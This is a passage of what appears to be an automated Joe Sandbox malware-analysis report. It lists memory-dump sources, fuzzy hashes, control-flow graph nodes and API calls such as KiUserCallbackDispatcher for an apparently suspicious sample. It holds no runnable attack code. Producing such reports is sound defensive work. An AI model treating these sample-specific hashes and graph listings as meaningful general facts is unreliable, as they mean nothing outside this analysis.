                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7D05E70A0510CEFCB80EFA8EA816DDB7F9EB45304B1081A9E408D7351EE316F08EB90
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e9e10a5b6c172fb0c47346198cacc541dcd351cdd53b0a5094e306a409cf67d6
                                                                                                                                                                                                                                  • Instruction ID: 081bc5ff78edb94c593f29154ed9c8c5cbdc455e24698d495a1956ac0df1bfb4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9e10a5b6c172fb0c47346198cacc541dcd351cdd53b0a5094e306a409cf67d6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CD0A731F401148FCB10E764E4582AD3772E784344F104461C819D7388DF744D5287C1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 61f0c6568fcbe04fd7c62adf344ac22168f3ea0b65fd207d0a96fe6147b14bff
                                                                                                                                                                                                                                  • Instruction ID: 4f2622da269b43bb231e147154fcd645fcc5b8c3c0d618136dc44f3ce6b2097b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61f0c6568fcbe04fd7c62adf344ac22168f3ea0b65fd207d0a96fe6147b14bff
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8AC012352081058FC219FFA4F9C86243315FB80708300065CE8098B1B8EF119C10CF15
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: af5557b8c283de06a1ef7b0ca6c4da1b5210b4a041b1060bef3bb99e24a772cc
                                                                                                                                                                                                                                  • Instruction ID: 6a531987ccfcefecc23b0e4f4bb49561435f7ac8abcd112b8bd69052e593705d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af5557b8c283de06a1ef7b0ca6c4da1b5210b4a041b1060bef3bb99e24a772cc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25C04C655455814BDA92E6148A963E87F21A943305394C0959199CA372CF95882EDB82

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:16.7%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                  Signature Coverage:30.8%
                                                                                                                                                                                                                                  Total number of Nodes:13
                                                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                                                  execution_graph 29705 1133860 29706 1133870 29705->29706 29709 11338bf 29706->29709 29710 11338f4 29709->29710 29711 1133bd1 LdrInitializeThunk 29710->29711 29712 1133882 29710->29712 29711->29710 29693 1133c98 29694 1133cc5 29693->29694 29695 1133dba LdrInitializeThunk 29694->29695 29696 1134135 29694->29696 29695->29694 29701 55547b8 29702 55547fe KiUserCallbackDispatcher 29701->29702 29704 5554851 29702->29704

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 330 5712eef-5712f0c 332 5712f4c-5712f5f 330->332 333 5712f0e-5712f41 330->333 336 5712f65-5712f90 332->336 333->336 337 5712f92-5712f9b 336->337 338 5712f9d-5712faa 336->338 339 5712fb0-5712fea 337->339 338->339 342 5713031 339->342 343 5712fec-5712ff3 339->343 344 571303b-5713057 342->344 343->342 345 5712ff5-5713002 343->345 346 5713313-571333d 344->346 347 571305d-571306f 344->347 348 5713004 345->348 349 571300a-5713018 345->349 359 5713343-5713354 346->359 350 5713075-5713112 347->350 351 5713198-57131d7 347->351 348->342 352 5713006-5713008 348->352 353 5713020-5713022 349->353 354 571301a 349->354 389 5713114-571314b 350->389 390 5713156-571318d 350->390 401 57131da call 5714af9 351->401 402 57131da call 5714b08 351->402 352->342 352->349 355 5713029-571302f 353->355 357 5713024 354->357 358 571301c-571301e 354->358 355->344 357->355 358->353 358->357 362 571335a-57133de 359->362 363 57133df-5713413 359->363 362->363 370 5713425-5713438 363->370 371 5713415-5713424 363->371 364 57131e0-5713203 368 5713209-57132ee 364->368 369 57132ef-5713311 364->369 368->369 369->359 371->370 389->390 390->351 401->364 402->364
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908665172.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5710000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: <$Deq
                                                                                                                                                                                                                                  • API String ID: 0-98595175
                                                                                                                                                                                                                                  • Opcode ID: c05cd7ce7845d4eeb583ce6a105d8ad97fcebbf931f4bfca42181c337fa3bca4
                                                                                                                                                                                                                                  • Instruction ID: 6a56403f7a3ba919e2580e1d12477e9a4e8fba1ae4cf21adbb002ef9a67486b6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c05cd7ce7845d4eeb583ce6a105d8ad97fcebbf931f4bfca42181c337fa3bca4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDF1C074E01228DFDB64DFA8C894BEDBBB2BF48300F1085A9E509A7250DB319E81DF44

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 800 5712c10-5712c42 801 5712c44 800->801 802 5712c49-5712d5a 800->802 801->802 804 5712d5c-5712d6e 802->804 805 5712d6f-5712dc0 802->805 804->805 810 5712e1c-5712e35 805->810 812 5712dc2-5712e02 call 5712a88 810->812 813 5712e37-5712e54 810->813 822 5712e04-5712e11 812->822 823 5712e1b 812->823 815 5712e63 813->815 816 5712e56-5712e62 813->816 820 5712e64 815->820 816->815 820->820 824 5712e19-5712e1a 822->824 823->810 824->823
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908665172.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5710000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Te^q
                                                                                                                                                                                                                                  • API String ID: 0-671973202
                                                                                                                                                                                                                                  • Opcode ID: f93f23713b69b439f568e680d0586df09c6a5db94b8cbe1802e4452015c839dc
                                                                                                                                                                                                                                  • Instruction ID: 967b90ab52001d0ee30e23dfff9dfd6dfff2012e2adf03396f3450e4d39ef752
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f93f23713b69b439f568e680d0586df09c6a5db94b8cbe1802e4452015c839dc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1661A870D01269CFEB28CF66C95879EBBB2BF84304F14C5AAD409B7294DB750A85CF54
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908665172.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5710000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 66e66213e516be8cacb180dd1d23ad88b586ebc18c16e657c15c0378fc16a5cb
                                                                                                                                                                                                                                  • Instruction ID: 1183cc65f077c117a87f7afd78e809d95d61dbbcac972d8f7eeb714898ee1e14
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66e66213e516be8cacb180dd1d23ad88b586ebc18c16e657c15c0378fc16a5cb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BCD2D475A012698FDB64CF69C984BDDBBF2BB49301F1481E6D908AB352C734AE80DF54
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908665172.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5710000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9be7307b771ba5b3369c7e2683e507805484628a044a6b5de87d7734e7002322
                                                                                                                                                                                                                                  • Instruction ID: 7efcdac07d3961c1fe1c50e0301e504bdff6c20a1caf2ec1ffe60595170eb648
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9be7307b771ba5b3369c7e2683e507805484628a044a6b5de87d7734e7002322
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6042D775E042198FDB14CFA9C980BDDFBF2BB49305F2491A9D808A7246C735AE85CF64
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908542497.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5700000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5d06889006364e357d6b5f8a9df8b80511653fc41fa0e79f5a2a5c1cc567d058
                                                                                                                                                                                                                                  • Instruction ID: f7dfaeaf6bb6d224b75f4577345e3ae29d872ba4dee96eb55f2e1b62538d215e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d06889006364e357d6b5f8a9df8b80511653fc41fa0e79f5a2a5c1cc567d058
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5F1DD74901228CFDB64CF65C898BEDBBF2BF4A301F1490EAD509A72A1D7759A84CF50
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908542497.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5700000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 6652e57f7a2d1a1d7cb0265cec9a76ef4f449fbc6cd8f3f043d4e09462a3c912
                                                                                                                                                                                                                                  • Instruction ID: 4871ce7a990551f79758e663958f04f922f9b0d0ef4b131c6d0d232ee318d38b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6652e57f7a2d1a1d7cb0265cec9a76ef4f449fbc6cd8f3f043d4e09462a3c912
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99F10274900229CFDB28CF65C958BEDBBF2BB49301F5090EAD54AA7291DB755E84DF00
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908665172.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5710000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ff1fd450a8d1c770a47f436d176bf6298042a90d42e7163c9b0cae6b502e21bf
                                                                                                                                                                                                                                  • Instruction ID: acb293faa5a219eca62dccd3f20112ef4eae59f1fd542cbc1484d68e61377fcc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff1fd450a8d1c770a47f436d176bf6298042a90d42e7163c9b0cae6b502e21bf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CC1F174D052688FDF14CFA9C984BEEBBF2BF48304F1481AAD809A7241D7349A85DF64

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 147 55547b2-555480c 151 5554817-555484f KiUserCallbackDispatcher 147->151 152 5554851-5554857 151->152 153 5554858-555487e 151->153 152->153
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(00000050), ref: 0555483B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2906742386.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5550000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                  • String ID: 4'^q
                                                                                                                                                                                                                                  • API String ID: 2492992576-1614139903
                                                                                                                                                                                                                                  • Opcode ID: 5a91d2c875e54c283183697cb2cbf80bc7d5cc7f85d056c897af0618d30143d7
                                                                                                                                                                                                                                  • Instruction ID: b5cb744d97718ee8a81a9cf9cdb66cbe868e138e8bd4a7eb0db028bfcacf9c9f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a91d2c875e54c283183697cb2cbf80bc7d5cc7f85d056c897af0618d30143d7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B2145B0D0025ADFCB10DFAAD8446EEBBF8FB48320F10855AE859A7251CB346945CFA5

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 156 55547b8-555484f KiUserCallbackDispatcher 160 5554851-5554857 156->160 161 5554858-555487e 156->161 160->161
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(00000050), ref: 0555483B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2906742386.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5550000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                  • String ID: 4'^q
                                                                                                                                                                                                                                  • API String ID: 2492992576-1614139903
                                                                                                                                                                                                                                  • Opcode ID: 19bf927875eee58afda1d704fdee707a2b23b6f34e050ee2fad839ea0b8a2043
                                                                                                                                                                                                                                  • Instruction ID: bd77ac0d97bf8ddad9b24a1575f8764d8fe5f47e274b7a9d7db8a77cff109d39
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19bf927875eee58afda1d704fdee707a2b23b6f34e050ee2fad839ea0b8a2043
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF2132B0D0025ACFCB10DFAAD8446EEBBF4FB48320F10855AE859B7291CB746945CFA5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908665172.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5710000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 28a531bd3aa8fa619ca9d6c5a57374083db5d168e20955f3651c22794e4c88e8
                                                                                                                                                                                                                                  • Instruction ID: 49aafc6274a09a5ba6c077498b5f9b9b09e45d0ca1002a8d76ac432c381063da
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28a531bd3aa8fa619ca9d6c5a57374083db5d168e20955f3651c22794e4c88e8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FCC04C3640A5404FCB42A7E4EB6A3443B75AF43610F1C8191C403C7753D1585946B622
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908542497.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5700000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 83d846bece23ef86bfaffa079492f81cbe8cfccb0ced39526d8c52d853c68bde
                                                                                                                                                                                                                                  • Instruction ID: 671066c74e0ea7ad8057688db6b843df668fb79283b18238b944ea47677aa312
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83d846bece23ef86bfaffa079492f81cbe8cfccb0ced39526d8c52d853c68bde
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DE19E74E01219CFCB50CF99D584AAEFBF2BF49310F25A1A9E408AB356D731A981CF54
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908542497.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5700000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: da114b3d0bfb3e15c6db42b6970c80d054dda71decc925889078a167dfd04919
                                                                                                                                                                                                                                  • Instruction ID: 7b9976965b7e46c03dc56c6a108940fe8055caa1c4c86ec83e905421b66c9380
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da114b3d0bfb3e15c6db42b6970c80d054dda71decc925889078a167dfd04919
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41911474D15218CFDB24CFA8C998BEDBBF1BF08305F24616AE406AB292D7749949DF10
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908665172.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5710000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e3b10070c3109c43ca01453c204df9a3b0c650edb445daa3e09f3607389ca75d
                                                                                                                                                                                                                                  • Instruction ID: 22d5e0c9a5b4c26d32a65946a3f3c1cc87c08772b614cc93cb929f9d7ec5c853
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3b10070c3109c43ca01453c204df9a3b0c650edb445daa3e09f3607389ca75d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8741E274E01208DFDB18DFA9D9A8ADDBBF2BF89304F10852AD805AB354DB359846CF44
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908542497.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5700000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 31afd07607a66623a52e4ab0c4ae1c406d9bc361b1f409dc87ded45ee2a90083
                                                                                                                                                                                                                                  • Instruction ID: 3f2c90cfd0d1cdf59985037d7d87039f9bfa5b2494dd85c56181d4bb28337707
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31afd07607a66623a52e4ab0c4ae1c406d9bc361b1f409dc87ded45ee2a90083
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE41BFB8D1521ACFCB40CFA9C484BEEBBF5BB08300F50A8A9E415A7391D7749A44CF50
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908665172.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5710000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 13b0cfb71b4ee765106666088d1bb2ff5178be5aa0098e8bfe510dc0e1d24eb6
                                                                                                                                                                                                                                  • Instruction ID: f884b5ad0e6fdccdd4d96b4dff2c06f7c6e5e8e322b1db06e18dc137f3eafcf1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13b0cfb71b4ee765106666088d1bb2ff5178be5aa0098e8bfe510dc0e1d24eb6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2310370E01208DFDB18DFA9D868AEDBBB2BF89310F14912AD815BB394DB345846CF44
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908542497.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5700000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9587f9bd91734f3de3f22101e3515c282364d4a6c3a9fe4f3f32474d068cd577
                                                                                                                                                                                                                                  • Instruction ID: b046cfbd0218b999cd998be0ec472e0736d415d753090d44e96856801c14ee08
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9587f9bd91734f3de3f22101e3515c282364d4a6c3a9fe4f3f32474d068cd577
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E214870905268DFDB05CFA4C844BEDBBF5BF0A300F146899E441B7391C7B88A44DB68
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908542497.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5700000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 903f040525e37ee9a98a0eb8724deeeaddef92eac944f55abdeb663dc73dae23
                                                                                                                                                                                                                                  • Instruction ID: d7a6f23c21109a95d799b4abdeafa6f606ad3c6e654a535224c6f6a1e86d9ca4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 903f040525e37ee9a98a0eb8724deeeaddef92eac944f55abdeb663dc73dae23
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60213830915228DFDB04CFA5C844BEDBBF4BF0A300F146459E441B3391C7B88A44DB68
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908542497.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5700000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d1929ecf82d837d528aa544c7f713b3d4649ad284b04ef57996e74e72cf0e098
                                                                                                                                                                                                                                  • Instruction ID: f347f7bb7c7174f8767df79e6982e9312a9679f19a93b54ed097bf94f26b8839
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1929ecf82d837d528aa544c7f713b3d4649ad284b04ef57996e74e72cf0e098
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B2134B4E0420ADFCB44DFA8D545AAEBBF1FB49301F5081AAD416E7391DB744A41CF91
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908542497.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5700000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 89131e2c3d6314ca7b2a29ecbd88b0000cef72b013d83e3b6bad98d023484291
                                                                                                                                                                                                                                  • Instruction ID: a5374ff46fb018e0744ca5c1405252efec8472f11c2f05cd8198344401ffd484
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89131e2c3d6314ca7b2a29ecbd88b0000cef72b013d83e3b6bad98d023484291
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5113674D01208EFCB40CFA4C844AEEBBF0FF09311F1190A9E814AB3A1D3759A95DB91
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908542497.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5700000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 640ff8af94549a9d80263400d0edf9719e9f4118e5ed36facfa533325cee57a6
                                                                                                                                                                                                                                  • Instruction ID: 49be008a4c2c7ce87e29669ce4663bb68076f73ed7abbab4baea27b945f921d9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 640ff8af94549a9d80263400d0edf9719e9f4118e5ed36facfa533325cee57a6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC1125B4D0420ACFCB44DFA8D5446AEBBF1FB48300F6081A9D416E7390DB745A41CF90
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908665172.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5710000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
